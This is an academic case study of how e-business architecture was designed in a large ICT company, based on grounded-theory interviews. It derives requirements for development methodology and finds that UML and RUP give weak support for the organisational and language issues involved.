Conventionally, architecture is understood as a high-level logical abstraction of the system defining the main components of the system and their relationships. The term architecture is used both in the context of an individual system and in the context of systems integration. Software architecture typically concentrates on the architecture of a single software system, whereas the terms information systems (IS) architecture and enterprise architecture (Kim & Everest, 1994; Ross et al., 2006; Sowa & Zachman, 1992) refer to the overall architecture of all information systems in an organization. In practice, however, the borderline between a single system and a set of systems is difficult to determine. Practically no system today is isolated from other systems, and the relationship of a system to its environment may be architecturally more important than the inner structure of the system, especially when developing e-business systems. Usually, systems rely on a common technical infrastructure (including networks, processing services, operation services, etc.) that is shared by all the systems in an organization. Organizationally, architecture design is a co-operative effort involving many roles in the development environment. These roles include the role of an architect, who is specifically associated with the task of architecture design. An architect needs contribution and commitment from many individuals, teams, and parts of the organization to succeed in the effort (Grinter, 1999). By architecture development, we mean a process where early design decisions are realized into an architecture that defines the system’s composition from various viewpoints. Architecture also contains the blueprints for the system’s implementation from conceptual and physical components. This process forms a set of documents which different stakeholders can use to relate their concerns to the issues made concrete by the architecture and to discuss their needs in the terms defined by the common architecture. They can also make decisions concerning system
development strategies and policies using architecture as a common reference. This conception sees architecture not only as a technical artifact but also as a boundary object (Star & Griesemer, 1989) with strong organizational connotations. The conventional role of architecture is to serve as an enabler for further design and implementation (Hofmeister, Nord, & Soni, 1999a; Shaw & Garlan, 1996). Obviously, a sound and well-designed technical architecture makes the detailed design and implementation of a system easier and less risky than it would be without such an architecture. Architecture defines, for example, the modules or components of which the system is composed, and therefore it focuses and constrains the solution space of the individual designers who develop individual components. This technical view of architecture has also produced studies related to UML. At the end of the last decade, the possibilities and weaknesses of UML as an architecture description language, and its complexity (Siau & Cao, 2001; Siau, Erickson, & Lee, 2005), were widely evaluated and enhancements were proposed (Conallen, 1999; D’Souza & Wills, 1998; Egyed & Medvidovic, 1999; Garlan & Kompanek, 2000; Hofmeister et al., 1999b; Medvidovic, Egyed, & Rosenblum, 1999; Rumpe, Schoenmakers, Radermacher, & Schürr, 1999). Recent developments in this area include the SysML extension of UML (Object Management Group, 2006). Different profiles and enhancements to UML have been proposed to tackle its limitations in electronic commerce (Dori, 2001).
RESEARCH PROCESS The studied organization is a globally operating ICT company having thousands of employees worldwide. Its customers include both consumers and businesses for which the organization provides various products and services. Software is one of the key assets in the organization’s service produc-
tion and product development. Historically, the organization has had several independent business units targeted at diverging business sectors. In addition, the information management of the organization has been distributed to these business units and the functions of enterprise level information management have included mainly the provision of network infrastructure, enterprise level accounting, and basic office tools. Most of the information systems in use have been implemented and operated by the business units that have been quite independent in their decisions concerning strategies for information management. However, recent developments in markets and technology have led the organization to set its strategies to a more integrative direction. For this reason, the organization has set an objective to provide an integrated e-business solution to both its consumer and business customers. This will include both implementation of a uniform Web-based customer interface and sufficient integration between the distributed operative back-end information systems, such as customer management and billing systems. The research process followed the grounded theory method (Glaser & Strauss, 1967), which is
a research method developed originally for social sciences by Glaser and Strauss in the 1960s and later developed and re-interpreted by the original authors (e.g., Glaser, 1978; Strauss & Corbin, 1990) and others (e.g., Locke, 2001; Martin & Turner, 1986). Grounded theory promotes inductive theory creation from the data. The objective is not to validate or test theories but to create one. The analysis process of the grounded theory is explicitly defined and consists of several coding phases. The coding starts from open coding in which any incident, slice, or element of the data may be given a conceptual label for the identification of commonalities. These commonalities are called categories and they are described in terms of their properties (Fernández, Lehmann, & Underwood, 2002). The coding continues with axial coding (Strauss & Corbin, 1990) or theoretical coding (Glaser, 1978), where relationships between the categories are resolved. The coding ends at selective coding (Strauss & Corbin, 1990) where the resulting theory is “densified” (Glaser, 1978) or a core category selected (Strauss & Corbin, 1990) and theory about that is described. The data collection is based on the notion of theoretical sampling, which means adjusting the
Table 1. Interviewed persons and their roles

Role | Tasks | Interviews
System architect | Deals with technological solutions and architectural structures in the e-business development project | 6
Enterprise system manager | Is responsible for a portfolio of systems and technologies that are used in a particular organization. Acts as a customer in the internal e-business development project or participates in it as an expert. | 5
Project manager | Manages resources and is responsible for the execution of a subproject of the e-business development project | 3
Software development manager | Is responsible for a permanent software development organization | 2
Project leader | Manages the e-business development super-project and supervises its set of sub-projects. | 1
System analyst | Participates in the requirements gathering and analysis phases as an intermediary between customers and technical experts. | 1
Marketing manager | Is responsible for the public image and services of the electronic channel. Requirements setter and a customer to the development project. | 1
data collection process according to the requirements of the emerging theory. The sources of data may be adjusted during the process and the data collection can be stopped whenever a state of theoretical saturation is achieved, meaning a situation where no additional data would further develop the categories and their properties. In the study, we interviewed 19 participants of the ongoing e-business system architecture design project during 2002, first in January and February and then later in November and December. The interviewees included six system architects, five enterprise system managers, three project managers, two software development managers, one project leader, one system analyst, and one marketing manager. Table 1 describes their relationship to the e-business development project. The interviews lasted from 45 to 120 minutes and they were completely transcribed as text. The interview themes of this study were adjusted during the data collection to reflect better the developing theoretical understanding of the researchers and the specific knowledge of the interviewees. The emphasis of the interviews changed according to the interviewee and the special knowledge in his or her possession. Because the data collection proceeded partly in parallel with the analysis, the emerging theory also caused changes in the emphasis of the interview themes. In grounded theory this kind of adaptation is called theoretical sensitivity, and for theory-building research this is considered legitimate because “investigators are trying to understand each case individually and in as much depth as feasible” (Eisenhardt, 1989, p. 539). Eisenhardt calls the process where the emergence of a new line of thinking causes the altering of data collection controlled opportunism “in which researchers take advantage of the uniqueness of a specific case and the emergence of new themes to improve resultant theory” (Eisenhardt, 1989, p. 539). The analysis in this study started with the open coding phase. In the beginning, we did not have any explicit a priori constructs for the analysis.
Our task was to search for mentions from the interviews that could be interpreted as meaningful in relation to the research question, “What are the conditions and constraints for creating and designing architecture in a large information systems development project?” The identified mentions related to this question were categorized using the software tool ATLAS.ti. During the open coding phase, altogether 187 emergent categories were found, and the categories were assigned to an emerging scheme of super categories or category families, including for instance changes, conflicts, consequences, experiences, problems, purposes, and solutions occurring during the e-business architecture design and implementation process. The axial coding started in parallel with the open coding, and causal relationships between categories were recorded with ATLAS.ti’s semantic network capability. Figure 1 shows an example of such a network diagram. In the figure, the boxes represent categories, the arrows between them interpreted causalities, and the lines associations between categories. The number of categories and the number of identified relationships between the categories added up to 187 categories and 200 relationships, which created a problem of how to report such a multitude of categories and relationships. The solution was sought by abstracting away those categories that occurred rarely in the data and were interpreted as less relevant to the research question, and by paying more attention to those categories that occurred frequently in the data. Inductively, we produced an explaining story of the events and forces under which the e-business development project had to work. The organization is facing market changes and is changing itself according to the changing markets. The objectives for the e-business development emerge from these changes, and because the change is continuous and continually brings new requirements for the e-business system, the objectives fluctuate considerably. In addition, the history and legacy structures of the organization
cause conflicts and problems in the development when combined with the need for change. These fluctuating objectives and emerging conflicts and problems brought certain consequences to the e-business architecture development in the organization. The formation and description of this explaining story can be considered as selective coding (Strauss & Corbin, 1990), and its details in the studied organization are explained in the next three sections. The study has required extensive interpretation and exploration in the studied organization, and therefore the main instruments of the research have been the researchers and their ability to interpret events and people’s actions correctly. Robson (2002) lists three threats to validity in this kind of research: reactivity (the interference of the researcher’s presence), researcher bias, and respondent bias, as well as strategies that reduce these threats. We have used these strategies in the following way:
• Prolonged involvement: Although this study lasted for one year, the research project altogether lasted for more than two years in the same organization and consisted of several phases and data collection rounds.
• Triangulation: The study has used data and observer triangulation as presented by Denzin (1978). To reduce the bias caused by researchers, we used observer triangulation, because the data collection was done by two researchers. The bias caused by data was minimized using data triangulation, where different sources of data were used. Interviews were the primary data collection method, but we also received many kinds of project and company documents and architecture descriptions.
• Peer debriefing and support: The research has included regular meetings and discussions with involved research participants from several research institutions. In addition, preliminary results of research phases have been presented and discussed in conferences and workshops (Smolander, 2003; Smolander, Hoikka, Isokallio et al., 2002; Smolander & Päivärinta, 2002a, 2002b; Smolander, Rossi, & Purao, 2002, 2005).
• Member checking: The interpretation of the data has been confirmed by presenting the results to company participants in the research project.
• Audit trail: All interviews have been recorded and transcribed. The notes and memos of the study have been preserved, and data coding and analysis results are available through the analysis tool used, ATLAS.ti.
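The way categories and their interpreted relationships were handled during open and axial coding can be pictured with a small sketch. The following hypothetical snippet records a few category-to-category links of the kind shown in Figure 1 and follows the causal links one step; the specific links are invented for illustration, and the actual coding in the study was done in ATLAS.ti.

```python
# Illustrative sketch of grounded-theory coding output: categories linked by
# interpreted causal relationships (the study itself used ATLAS.ti for this).
from collections import defaultdict

# (source category, relation, target category) - hypothetical example links
codings = [
    ("Experience: independent businesses", "causes", "Conflict: different legacy systems"),
    ("Conflict: different legacy systems", "causes", "Problem: creating common understanding"),
    ("Problem: unclear objectives", "causes", "Consequence: limited design"),
    ("Problem: tight schedule", "causes", "Consequence: minimal solution"),
]

outgoing = defaultdict(list)
for source, relation, target in codings:
    outgoing[source].append((relation, target))

def consequences_of(category):
    """Follow 'causes' links one step from the given category."""
    return [target for relation, target in outgoing[category] if relation == "causes"]

print(consequences_of("Conflict: different legacy systems"))
# -> ['Problem: creating common understanding']
```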
CHANGES AND THEIR EFFECTS IN THE DEVELOPMENT CONTEXT Starting Point: Changing Markets, Changing Organization During the time of the data collection, there was a considerable change going on in the ICT market, and the organization under study had undergone a deep change. A few years earlier, the strategies had emphasized growth and the utilization of the possibilities in the stock market. This reinforced independent business units inside the organization, since growth was easier to handle through independence. Each of the business units built independent e-commerce solutions and customer extranets, which resulted in a fragmentary set of e-commerce solutions for customers, with separate Internet sites, sales and billing systems, and Web-based customer support. When beliefs in the possibilities of the ICT sector’s continuing growth diminished, the organization had to change its strategies from growth to profitability and from stock market orientation to customer orientation. With independent business units, there was no authority in the organization that would see a customer as a whole. Instead, each business unit kept track of the customers only in
the context of its independent business. To produce a unified customer interface, a profound change to the way of building information systems was needed, together with an integrated e-business solution. This change would also require changes in business practices and organization. The organization should operate in a more integrated fashion, and the barriers between independent units should be lowered. The organization began to see technical e-business architecture as an enabler of change. The IS organizations in the independent business units were obliged to cooperate and enforce commitment to the integration of information systems. This also emphasized the role of central information management, which had been in a minor role thus far. Now, its roles would include the enforcement of information systems integration and enabling the unification of the sales channels and customer management for the planned e-business solution. At this point, the organization decided to establish a working group of systems architects from various parts of the organization. In the following section, we shall describe the context and the forces under which this group of architects was developing and designing the unified e-business architecture.

Figure 1. An example of a semantic network from axial coding
Conflicts, Problems and Varying Purposes The context for e-business architecture development included many issues, which the working group for technical architecture development had to face and be aware of. These included the market changes as described above, historical organizational inertia, fluctuating requirements and objectives, and conflicts and problems emerging from the market changes, inertia, and unclear objectives.
Historical Inertia The organization’s history with independent businesses and their diverging functions and
objectives had both psychological and technical consequences, causing slow progress and conflicts in the integrated e-business development. Each of the business units had legacy systems with incompatible information structures, technical architectures, and operating principles. It was not possible in practice to replace these systems with a uniform solution at once. The historical inertia also had effects on the organization responsible for information management and information systems. Because of the independence, the organization had no clear central information management that could take responsibility for the e-business architecture development. Many of the conflicts and problems described later arose from this situation.
The Observed Objectives for the E-Business System The fluctuating objectives, meanings, and requirements for the e-business architecture created another source of conflicts and problems. In a large organization with a high degree of independency, the conceptions among different business units and individuals about the purposes of an e-business solution vary considerably. Among the interviewees, we identified a large set of different purposes for the e-business system, which were then classified in five distinct classes:
• Creation of a unified electronic customer interface.
• Reduction of costs.
• Integration of information systems.
• Gaining business advantage.
• Implementing an organization change.
This list of observed purposes for the e-business system looks quite comprehensive and ambitious. Different interviewees emphasized the purposes differently, and many saw that the only realistic objective was to implement a single sign-on procedure with a minimal level of
customer information integration. The list nevertheless shows the complicated and conflicting nature of objectives for the e-business system when it is developed for a large enterprise.
Emerging Conflicts and Problems Changes in markets and organization, the history of the organization, and the complicated objectives for the e-business system put the architecture development group in a difficult situation. The group and its members were obliged to respond by some means, and these responses mitigated the role of deliberate design in the development process. In open coding, we identified in total 48 categories of conflicts and problems. This list was further combined into seven main categories, as follows:
• Varying requirements and unclear objectives
• Problems in the cooperation between technical and business people
• Conflict avoidance and problems in decision-making
• Problematic role of the central information management and its missing working practices
• Difficulties in creating common understanding about the architecture
• Difficulties in determining the level of integration
• Problems of implementing the integration
As described earlier, the purposes of the system were manifold and complicated, and the requirements varied according to the business needs in the business units. The architects held this ambiguity of objectives and requirements to be the biggest obstacle in the development. Those at the managerial level recognized the problem as well, but explained it as unavoidable in the situation and expected that the first prototypes of the system would bring more clarity to the objectives. This resembles
the chicken-and-egg problem: architects must know the objectives well to design the architecture, but the objectives are further clarified only after the first version of the architecture is built. There were several mentions of problems in the cooperation between technical and business people. Architects expected the business managers to explicate clear requirements and objectives for the system and its architecture. However, they considered the task impossible, because they thought that the business managers did not possess enough understanding of the possibilities of current technology. They felt that this led to unrealistic objectives, which were manifested especially when considering the possibilities of legacy systems integration: people with a business background had far more optimistic views than the architects. Conflict avoidance and problems in decision-making slowed the progress. Again, because of the history of independence, a central authority that could take care of the architectural decisions for the integrated e-business solution was missing. Because nobody took full responsibility for the situation, this led to the avoidance of conflicts and enforced the tendency towards compromises. A frequently occurring phrase among the architects was the term “lowest common denominator,” which usually referred to the compromised solution of a single sign-on procedure with a minimal level of customer information integration. The role of the central information management was unclear, and it lacked the routine of large development efforts. The independence of the businesses and the minor role of central information management had implications for the working practices. The architectural and development practices of the business units contained considerable differences, implying that common working practices also needed to be established for the development process of the e-business system. Even the understanding of the designed architecture and related technical solutions was difficult to communicate across the
organization. Since the business units had had their own histories and produced their own legacy systems and information architectures, the interpretations of the situation and objectives diverged. This, combined with the changing organization, unclear objectives, and missing common working practices, created difficulties in understanding and transferring architectural knowledge between the participants from different business units. It was also difficult to determine the level of integration between the systems. The ownership of information becomes an issue even in the most modest single sign-on e-business solution serving the whole organization. The question becomes, “who owns the customer information?” and relates to determining the level of integration with the currently independent back-end legacy systems. The more ambitious the integration, the more control over the customer information (and possibly other information too) shifts away from the business units. In addition to determining the integration level, the actual implementation of the integration proved to be problematic. Since the diverging legacy systems could not be replaced, they all had to be interfaced. Of the seven conflicts and problems occurring when creating the e-business architecture, only the problem of implementing the integration was mainly a technical problem. The others were more related to the change in organization and practices that happens when developing an e-business system in a large organization with independent businesses. In the following, we shall look more closely at the consequences these conflicts and problems caused for the architecture design and development process.
CONSEQUENCES: LIMITED DESIGNS AND MINIMAL SOLUTIONS In the beginning of the project, a unified architecture was seen as a panacea for solving the
problems of systems integration, streamlining the organization, and unifying the customer interface. However, during the project it became clear that the aforementioned conflicts and problems would have some unfavorable consequences. While it was of paramount importance for the company to be able to streamline its systems and develop a more coherent architecture enabling the creation of an e-business system, the realities of the legacy systems and the organization led to a situation where it was best to seek satisfying, even minimal, solutions instead of optimal ones. In the early phases of the project, architecture was seen as general blueprints or roadmaps, largely drawn from scratch. Soon, however, the technical experts realized that evolutionary prototyping was the only possibility for progress in the architecture development. Because the schedule was tight, the objectives and requirements unclear and changing, and the business units rather independent, it was hard to achieve common understanding and commitment. With prototyping, it would be possible to clarify objectives and commit stakeholders by showing them visible results and benefits. This could be seen as “extreme” architecture design (Merisalo-Rantanen, Tuunanen, & Rossi, 2005). It could, however, lead to new problems. The technically oriented architects were especially worried that, combined with the quarter-based reporting system in the organization, evolutionary prototyping could easily produce quick-and-dirty and ad hoc solutions. We could classify the interviewees into those with positive attitudes towards prototyping and those with negative or doubtful attitudes. In general, the project management believed positively that “somehow” the prototypes would transform into the final e-business solution, whereas the technical architects presented more doubts and wanted to have explicit requirements and objective statements before committing to certain architectural solutions. Prototyping and minimal solutions formed a vicious circle that made the development of
robust and clear architectures nearly impossible by severely limiting the options available to the architecture developers. Existing legacy systems, the evolutionary approach, varying requirements, unclear objectives, difficulties in creating common understanding, and problems in decision-making created a complex situation where textbook methods, description languages, and rational architecture design, as it is conceived in the literature, had no possibility of immediate success. The degrees of freedom of design became limited. The system and its architecture could not be designed rationally as a whole; rather, one needed to accept the conditions and limitations caused by the factors above and to keep the day-to-day operations running while the new systems were continuously created through evolution. The situation also had organizational consequences. We found clear hints of low-level networking and the formation of shadow organizations as the result of unclear project organization and problems of decision-making and objective setting. As the organization and responsibilities change, new and perhaps inexperienced persons come into crucial official positions related to the e-business development. At the same time, the experienced architects and other key persons continued to stay in contact with each other. This unofficial shadow organization balanced the mismatch in skills and experience that might otherwise have seriously impeded the development. The final consequence of all the above is that, in fact, the e-business architecture becomes emergent: it is created gradually through
compromises, constraints, and conflicts (cf. Ciborra, 2000; Hanseth, Monteiro, & Hatling, 1996). The exact objectives and responsibilities will be resolved as the architecture emerges through evolutionary prototyping. Compared to the conventional view of software architecture design (Hofmeister et al., 1999a), most of the claimed benefits of rigorous architecture development seem to be lost. There is no “grand plan,” since the work proceeds on a day-to-day basis, and well-defined responsibilities and interfaces between systems do not necessarily emerge in a rationally planned way; rather, most duplicate functions are kept and there is agreement only on a few items that become the “architecture.”
DERIVED REQUIREMENTS FOR E-BUSINESS SYSTEMS DEVELOPMENT METHODOLOGY From the previous observations and explanations, we can derive a set of requirements that an e-business systems development methodology should meet. The grounded theory process resulted in an explanation model (Figure 2), from which a set of methodological requirements can be extracted. Changing markets and organization, historical inertia, and unclear objectives for the development produced a complex combination of conflicts and problems that brought various difficult consequences to the e-business development process. We analyzed the complex socio-technical situation and its consequences and reasoned the set of most
pertinent methodological requirements. This was done by identifying and coding the methodological requirements in the interview transcripts and further combining them into 13 requirements, as described below.

Figure 2. Explanation model: changing markets and changing organization, historical inertia, and diverse objectives for e-business systems development lead to consequences for e-business architecture development and to requirements for e-business development methods

According to Lyytinen et al., a design methodology should conform to a set of key requirements (Lyytinen, Smolander, & Tahvanainen, 1989). It must embed several conceptual structures and description languages, and support several levels of abstraction at which the development process takes place. It should also cover the whole spectrum of activities in information systems development (ISD), include a prescribed model of activities to be carried out during the development process, include a model of the organizational form of the development (a set of human roles), and try to reuse existing descriptions and implementations. Tools for drawing, manipulating, and managing the descriptions should also support the methodology in a balanced manner. We can further elaborate this conception of ISD methodology by distinguishing between three separate contexts in ISD, namely the technical, language, and organization contexts (Lyytinen, 1987). The technical context is concerned with the technical components of the system (such as hardware and software), the language context forms the environment for linguistic communication, and the organization context provides the environment for systematic human interactions, including decision-making and operative control. An ISD methodology includes assumptions, models, languages, and tools related to these three contexts. In the following, we shall extract from the case the general requirements for e-business development methodology and classify them according to these contexts. The objective of this classification is to illustrate the nature and requirements of e-business architecture development in large organizations with several business areas and to highlight the areas with weak methodical support. Lyytinen commented already in 1987 that most development methodologies have too limited
scope and they tend to concentrate on technological issues late in the development lifecycle (Lyytinen, 1987). This limited scope omits most of the institutional and governance issues which seemed to be central for most stakeholders according to this study on architectural practice. One could argue that the organizational context is particularly relevant for e-business area, as most proponents of e-business emphasize the changes it brings about to work processes and organizations (Kalakota & Robinson, 2001). The research into e-business architecture development is in a relatively immature stage. Previous literature has largely assumed that it solves technical issues for known problems (Taylor, McWilliam, Forsyth, & Wade, 2002). However, from the previous passages it has become obvious that methods for forming the problem statement and reaching a mutual agreement on what the architecture is in the end of the day are crucial. In this section, we take this as a starting point and observe the issues that rose in the described case starting from the inner, technical context and ending to the general organizational issues. This corresponds to Lyytinen’s idea that the contexts are hierarchically ordered, because languages are presented by material carriers of technology context and language is needed for organized social action (Lyytinen, 1987). We identify e-architecture approaches in these areas and show how they propose solutions to the issues raised in our study. In the following, we shall present the methodological requirements for each context. We also refer to the rows in Table 1 with the notation R1-R13.
Requirements from the Technology Context
Observed Requirements
The technical requirements of e-business development methods do not differ much from those of
methods for traditional transaction-based information systems. E-business system development includes methodical requirements concerning e.g. distribution, error recovery, and networking, but those requirements can be met without a special “e-business support.” A standard way to describe such technical solutions is of course required /R1/. Integrated e-business architecture necessitates the integration of information systems in the organization and the rationalization of technology and development processes. Existing legacy systems will be integrated to the e-business functionality. This requires the selection of an integrative technology and the construction of development processes supporting the implementation of the integration. Because the integration is the basis and characteristic to e-business development, the development methodology should have specialized and usable techniques for describing information systems integration /R2/. The key issue in the development of e-business systems is the keeping of the day-to-day operations running and at the same time implementing the integration between existing legacy systems and the new e-business functionality. This means that the nature of development is in many cases more analogous to a maintenance project than to a green-field development project. Current systems development methodologies and models of thought are mostly aimed at designing new systems instead of changing existing ones. This problem has been recognized before the advent of e-business, but it becomes more critical in the e-business development. From this we can derive a requirement that the development methodology for e-business systems should support evolutionary approaches to architectures and systems /R3/.
Existing Solutions
Most research on e-business systems development in general, and e-business architecture in particular, concentrates on this view. Much of
the support that UML and RUP or their derivatives provide seems to concentrate on this area. Component-aware methodologies, such as the Catalysis extension to UML, seem suitable for e-business. In addition, there are UML 2.0 extensions, such as SysML (Object Management Group, 2006), that provide better support for technical architecture design. Bichler and Segev (Bichler et al., 1998) investigate the possibilities of a component-oriented approach for e-business. They take a technical viewpoint and provide a useful listing of enabling technologies for e-business. An applicable standard in this area is the SysML extension to UML (Object Management Group, 2006). A work by Rossi and Schwabe (Rossi & Schwabe, 2000) uses patterns and frameworks as building blocks for e-business systems. This kind of approach could be particularly useful for a relatively well-specified domain, such as trade processes, which are assumed to be generic in nature. Baskerville and Pries-Heje see a relatively fixed architecture as a common ground on top of which e-business systems can be built (Baskerville & Pries-Heje, 2001). As mentioned earlier, in the e-business domain there are several layers of components available. The InterNCA architecture in (Lyytinen, Rose, & Welke, 1998) describes some of these and outlines the need for a new breed of development methodologies that would take into account the particular problems of e-business systems development. Greunz and Stanoevska-Slabeva present an extension of UML, which can be used to realize systems on top of a “media platform” architecture (Greunz & Stanoevska-Slabeva, 2002).
Requirements from the Language Context
The language context provides a means and an environment for linguistic communication which encompasses the use, nature, content, context, and form of signs (Lyytinen, 1987). The methodology requirements coming from the language
context deal with the ability of stakeholders to communicate successfully during the e-business architecture development process.
Observed Requirements
The chicken-and-egg problem between objectives and architecture becomes acute in e-business development. To design a robust technical architecture, one must have clear objectives, and to select realistic objectives, one must understand the possibilities of the technical architecture. To overcome this problem, it is necessary to have close cooperation between technical architects and those responsible for the business. This, however, induces a language problem: these groups often do not have a common language. To overcome the language problem, we need architecture description languages that business managers understand /R4/ and business descriptions that are explicit enough for technical people /R5/. The problems of objectives and integration culminate in architecture design because the designs and prototypes related to technical architecture become the first concrete artifacts in the development showing the implications of decisions to the businesses and to information management. Before architecture design, the plans and designs have been at the “PowerPoint presentation” level, showing ambiguous and general roadmaps and noble objectives. The more concrete the architecture becomes, the more the various stakeholders become aware of the consequences, conflicts, and problems they will be facing. This leads to two distinct requirements for the development methodology: the methodology should take the development to a very concrete level (both politically and technically) very soon after the project initiation /R6/, and the architecture designs and descriptions (and their implications) should be approachable and intelligible by the various stakeholders participating in the process /R7/.
Existing Solutions
As a description language, UML and its extensions offer fairly strong support for engineering in the language context. Yet there are very few articles describing these issues of having a common language in the e-business area, but one could expect that methodologies used in other domains for participative processes and joint application development could be applied here (August, 1991). In this context, architecture serves as a language between the participants in the development process, enabling communication and making the consequences of the implementation concrete to the participants. Using architecture as an enabler of communication between a diverse set of participants (including various levels of management and technical experts) requires informal and expressive approaches, which are practically non-existent in the field of software architecture research. This kind of conception of “architecture as language” can be associated with approaches that include rich and informal description techniques, like “rich pictures” (Wood-Harper, 1985), the wall-charting technique (Saaren-Seppälä, 1988), and genre-based approaches (Päivärinta, Halttunen, & Tyrväinen, 2001).
Requirements from the Organization Context
Observed Requirements
These problems formed the largest group in our study. They included issues such as organizational inertia as well as environmental limitations, characteristics of a given business environment, codes of conduct in business, and regulatory and societal factors. Together these factors form the ‘ballpark’ within which an organization acts in relationship with its providers and customers.
The first organizational requirement comes from the overall conclusion of the case. The transition from heterogeneous e-commerce to integrated e-business is not only technically challenging. It is more a profound change to the organization. In fact, the primary challenge is in the change of the organization, not in the implementation of the technology. Therefore, e-business systems development methodology should support also the description of organizational change /R8/. In this change of organization and implementation of technology, the role of central information management or some kind of central authority in the organization is crucial. The central authority should take care of the multitude of conflicts occurring when aiming at integration and coordinate the creation of objectives for the system. An ebusiness development methodology should enable the creation of a common vision /R9/, which can then be enforced by the central authority. Evolution with modest but growing objectives may be the only way to develop integrated e-business systems. To foster commitment, some immediate benefits should be shown with the prototypes for each stakeholder. However, at the same time, the path to robust architecture should also be secured and enough time and resources must be given to technical architects. This very difficult and complex trade-off must be made in every e-business project /R10/. The implementation of e-business integration deals not only with technical issues but also with difficult political ones. An organization shifting to integrated e-business must resolve issues concerning the internal ownership of information related for instance to customers, sales, contracts, and products. The ownership and responsibilities related to information must be decided and described during the development process. The development methodology should include descriptions for organizational responsibilities and ownership of information /R11/. Identifying and agreeing about objectives became the most difficult problem in this case.
Thus, to become valuable in practice, e-business development methodology should support not only the formation and recording of objectives but also the measuring of success related to those objectives /R12/. The requirements directed at an e-business development organization are quite conflicting. On the one hand, the development requires a strong authority that can control the process through conflicts, and on the other hand, the formation of an unofficial and shadow organization (peer-level networking) should be fostered to allow creative solutions and frictionless cooperation between businesses /R13/. This requirement is, however, not a new one when developing organizations.
Existing Solutions
From a more managerial and decision-oriented view, one could look at business and strategy development methods, which aim at the creation of a common understanding and vision of business strategy. This view sees the building of architecture as a common vision-building effort rather than a system-building effort. It could also be argued that e-business architecture building is quite similar to organizational change processes, especially the introduction of enterprise-wide information systems, such as ERP. Koontz has argued for this by presenting an e-business architecture development model, which is very generic (Koontz, 2000). Organizational issues are largely neglected by traditional systems development methodologies, but they form an important context and frame for the implementation of e-business systems and architectures. The work on organizational change and the observation of power-play could be fruitful if applied to the early stages of architecture development. However, these studies merely observe the issues rather than provide solutions. Checkland’s SSM methodology is one of the few general-purpose methodologies that identifies and models the “essence” of the organizational idea of the system and then proceeds to the actual development of the
system (Checkland & Scholes, 1990). It is clear from the observations in this case study that the explicit identification and framing of the problem to be solved, and then resolving the actual goals of the architecture, forms the basis for architecture development. Most studies thus far seem to assume that the development of e-architecture and infrastructure can be guided by the deliberate actions and decisions of management. However, as can be seen here, technological changes often evolve from designers’ and users’ experience with such technologies and are often unpredictable (Ciborra, 2000). The problem of losing the original target while developing partial solutions and prototypes (e.g., see R10) could be helped by explicitly recognizing emergent and opportunistic possibilities created in the process.
Summary of Issues
The list above shows that most solutions and research thus far have concentrated on the technical level. Unfortunately, most of the problems seem to be non-technical in nature; they are rather linguistic or organizational. E-business cuts across functional borders in the organization and is built on a complex infrastructure of ERP and legacy systems, and it shares many of the challenges and opportunities of these organizational technologies. Table 2 summarizes these derived requirements for e-business development methodology. The requirements and their rationale are described in the text above. The ‘Type’ column places the requirement in the appropriate context or contexts (T: technology, L: language, O: organizational). The last column in the table (“Support in RUP employing UML”) analyzes how the Unified Modeling Language (Object Management Group, 2005) and the Unified Process (Rational Software Corporation, 2001) support the e-business specific
characteristics of the development process. This is important, because UML and RUP together form the current methodological basis for many software organizations. The column shows that the support is generally poor. The e-business specific requirements are not met by UML and RUP —only the standard technical issues are well covered. This conclusion calls for method development supporting better these e-business specific requirements. In the technical context we noted that e-business development would benefit from method enhancements in IS integration and evolutionary development. However, the language and especially the organization context appeared to have more importance in the development. In the language context, there was an urgent need for more understandable and concrete architecture descriptions that could be used among many groups involved in the process, including technical and non-technical people. The organization context appeared as the most important target for research and practical methodical improvements. In that context, we could identify a multitude of issues requiring improvements, including better understanding and usable methods for the design and implementation of organization change, organizational vision, organizational ownership of information, and organizational responsibilities. Figure 3 shows concisely our findings. When creating e-business or enterprise architecture, the major problems to be solved are organizational. This does not align with the support that UML and RUP provides, because they mostly concentrate on solving the problems in the language and technical contexts. It is the task of future research to provide improvements to this, but, as can be seen from Table 2, it might need quite radical extensions or changes to UML and RUP to be able to support effectively the formation of e-business architecture.
Table 2. Summary of the requirements for e-business development methodology (Type: T = technology, L = language, O = organizational)

R1. Requirement: Technical issues (like distribution, error recovery, and networking) must be described in a standard way. Type: T. Rationale: These issues occur in all modern systems development. Support in RUP employing UML: Good; this is what UML and RUP are for.

R2. Requirement: Specialized techniques for describing information systems integration. Type: T. Rationale: IS integration is characteristic to e-business development. Support in RUP employing UML: Poor; no specialized technique for the description of integration in standard UML. Some UML 2.0 extensions are, however, available.

R3. Requirement: The development methodology should support evolutionary approaches to architectures and systems. Type: L/T. Rationale: The change and maintenance of existing systems forms a major part of e-business systems development. Support in RUP employing UML: Moderate; UML and RUP are mainly targeted at the development of new systems.

R4. Requirement: Architectural description languages that business managers understand. Type: L. Rationale: To enable realistic objective selection, business managers must have some understanding of the architecture. Support in RUP employing UML: Poor; the descriptions require too much technical skill and knowledge.

R5. Requirement: Business descriptions that are explicit enough for technical people. Type: L. Rationale: To understand the objectives, technical people must have an understanding of the business. Support in RUP employing UML: Moderate; no description techniques showing an overall aggregate view.

R6. Requirement: The methodology should take the development to a very concrete level (both politically and technically) soon after the project initiation. Type: T/L/O. Rationale: The more concrete the architecture becomes, the more stakeholders become aware of the consequences, conflicts, and problems. Support in RUP employing UML: Good (technically), none (politically).

R7. Requirement: The architecture designs and descriptions (and their implications) should be approachable and intelligible by the various stakeholders participating in the process. Type: L/O. Rationale: To enable wide understanding of the consequences of architectural selections (cf. R4). Support in RUP employing UML: Moderate; no relevant description technique besides Use Case diagrams.

R8. Requirement: Support for the description of organizational change. Type: O. Rationale: e-business involves deep changes to the organization. Support in RUP employing UML: Poor; some thoughts on “organization engineering” in RUP’s Business Architecture.

R9. Requirement: Support for the description of a common vision. Type: O. Rationale: Resolve conflicts, build objectives. Support in RUP employing UML: Poor; no common language for all stakeholders.

R10. Requirement: Both prototyping and careful architecture design needed. Type: T. Rationale: Gain commitment and resolve objectives through prototyping, aim at a robust architecture. Support in RUP employing UML: Moderate; iterative basis in RUP, but its implementation is difficult in practice.

R11. Requirement: The methodology should contain descriptions for organizational responsibilities and ownership of information. Type: L/O. Rationale: The ownership of information becomes an issue when aiming at e-business integration. Support in RUP employing UML: Poor; only general thoughts.

R12. Requirement: The e-business development methodology should support the formation and recording of objectives and the measuring of success related to objectives. Type: L/O. Rationale: Identifying and agreeing on objectives is one of the most difficult issues in e-business development. Support in RUP employing UML: Poor; the objectives are mostly supposed to be given to the development project.

